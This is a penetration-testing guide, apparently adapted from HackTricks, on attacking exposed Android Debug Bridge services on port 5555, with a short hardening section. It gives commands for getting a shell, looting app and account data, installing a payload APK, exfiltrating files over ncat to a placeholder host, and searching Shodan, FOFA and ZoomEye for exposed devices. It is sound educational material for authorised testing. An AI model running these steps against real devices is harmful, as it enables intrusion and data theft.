5555 - Adb

💡 学习提示: 本文档介绍 5555 - Android Debug Bridge 的渗透测试方法，适合信息安全初学者和从业人员参考。

⚠️ 法律声明: 本文档仅供学习和授权测试使用。未经授权的系统测试可能违反法律法规。

⚠️ 法律声明: 本文档仅供学习和授权测试使用。未经授权的系统测试可能违反法律法规。

5555 - Android Debug Bridge

基本信息

Android Debug Bridge (adb) is a command-line tool to communicate with Android-based devices and emulators. Typical actions include installing packages, debugging, and getting an interactive Unix shell on the device.

Historical default TCP port: 5555 (classic “adb tcpip” mode).
Modern Wireless debugging (Android 11+) uses TLS pairing and mDNS service discovery. The connect port is dynamic and discovered via mDNS; it may not be 5555. Pairing is done with adb pair host:port followed by adb connect. See the notes below for offensive implications.

示例 nmap fingerprint:

PORT     STATE SERVICE VERSION
5555/tcp open  adb     Android Debug Bridge device (name: msm8909; model: N3; device: msm8909)

Connect

If you find ADB exposed and reachable, try connecting and enumerating quickly:

adb connect <ip>[:<port>]      # Default is 5555 for classic mode
adb devices -l                 # Confirm it shows as "device" (not unauthorized/offline)
adb shell                      # Get an interactive shell (uid usually shell)
whoami; id; getprop ro.debuggable ro.secure service.adb.tcp.port
adb root || true               # Works on eng/userdebug/insecure builds, many emulators/IoT

If the device enforces ADB authentication (ro.adb.secure=1), you’ll need to be pre-authorized (USB RSA auth) or use Android 11+ Wireless debugging pairing (which requires a one-time code displayed on the device).
Some vendor images, engineering/userdebug builds, emulators, TVs, STBs and development kits expose adbd without auth or with adbd running as root. In those cases, you’ll typically land directly in a shell or root shell.

For a general ADB command reference, see:

../mobile-pentesting/android-app-pentesting/adb-commands.md

Quick Post-漏洞利用

Once you have shell, validate privileges and SELinux context:

id; getenforce; getprop ro.build.type ro.product.model ro.build.fingerprint

Enumerate and capture data

List third-party apps and paths:
```
pm list packages -3
pm path <pkg>
```

If you have root (adb root or su works), you can access /data directly. If not, prefer run-as for debuggable apps:

# Without root, for a debuggable app
run-as <pkg> sh -c 'cd /data/data/<pkg> && tar cf - .' | tar xf - -C ./loot/<pkg>

# With root
cp -a /data/data/<pkg> /sdcard/<pkg>
exit
adb pull "/sdcard/<pkg>"

Useful system artifacts (root required):
- /data/system/users/0/accounts.db and related AccountManager data
- /data/misc/wifi/ (network configs/keys on older versions)
- App-specific SQLite DBs and shared_prefs under /data/data/

You can use this to retrieve sensitive info (e.g., app secrets). For notes about Chrome data considerations, see the issue referenced here.

Code execution and payload delivery

Install and auto-grant runtime permissions:

adb install -r -g payload.apk         # -g grants all runtime perms declared in manifest
adb shell monkey -p <pkg> -c android.intent.category.LAUNCHER 1

Start activities/services/broadcasts directly:

adb shell am start -n <pkg>/<activity>
adb shell am startservice -n <pkg>/<service>
adb shell am broadcast -a <action>

端口 forwarding and pivoting

Even without root, adb can forward local ports to device ports and vice versa. This is useful to access services bound locally on the device or to expose attacker services to the device.

Forward host->device (access a device-local service from your host):

adb forward tcp:2222 tcp:22       # If device runs SSH (e.g., Termux/Dropbear)
adb forward tcp:8081 tcp:8080     # Expose app’s local debug server

Reverse device->host (let the device reach a service on your host):

adb reverse tcp:1080 tcp:1080     # Device apps can now reach host:1080 as 127.0.0.1:1080

File exfiltration over sockets (no sdcard writes):

# On host: listen
ncat -lvp 9000 > dump.tar
# On device: send directory as tar (root or run-as as applicable)
adb shell "tar cf - /data/data/<pkg>" | ncat <HOST_IP> 9000

Wireless Debugging (Android 11+)

Modern Android implements TLS-protected wireless debugging with device-side pairing and mDNS discovery:

## On the device: Developer options -> Wireless debugging -> Pair device with pairing code
## On attacker host (same L2 network, mDNS allowed):
adb pair <device_ip>:<pair_port>   # Enter the 6-digit code shown on device
adb mdns services                  # Discover _adb-tls-connect._tcp / _adb._tcp services
adb connect <device_ip>:<conn_port>

Notes

Ports are dynamic; don’t assume 5555. mDNS service names look like:
- _adb-tls-pairing._tcp (pairing)
- _adb-tls-connect._tcp (paired connect)
- _adb._tcp (legacy/plain)
If mDNS is filtered, classic USB-assisted enabling may still work on some builds: adb tcpip 5555 then adb connect <ip>:5555 (until reboot).

Offensive implications: if you can interact with the device UI (e.g., physical access or mobile MDM misconfig) to enable Wireless debugging and view the pairing code, you can establish a long-lived paired ADB channel without a cable. Some OEMs expose ADB over TCP in engineering/dev images without pairing—always check.

Hardening / Detection

Defenders should assume any reachable adbd (TCP) is critical risk.

Disable ADB and Wireless debugging when not needed. Revoke USB debugging authorizations in Developer options.
Ensure network policy blocks inbound TCP/5555 and mDNS-based ADB discovery on untrusted segments.

On devices under your control:

settings put global adb_enabled 0
setprop service.adb.tcp.port -1   # disable TCP listening (or use: adb usb)
stop adbd; start adbd             # restart daemon

Monitor for mDNS records _adb._tcp, _adb-tls-connect._tcp, _adb-tls-pairing._tcp on corporate networks and alerts for unexpected 5555 listeners.
Inventory for insecure builds: getprop ro.debuggable, ro.build.type, and ro.adb.secure.

Shodan

android debug bridge
port:5555 product:“Android Debug Bridge”

搜索引擎语法

FOFA

# FOFA 搜索语法
port="5555"

Shodan

# Shodan 搜索语法
port:5555

ZoomEye

# ZoomEye 搜索语法
port:5555

📖 参考资料

HackTricks - 5555-adb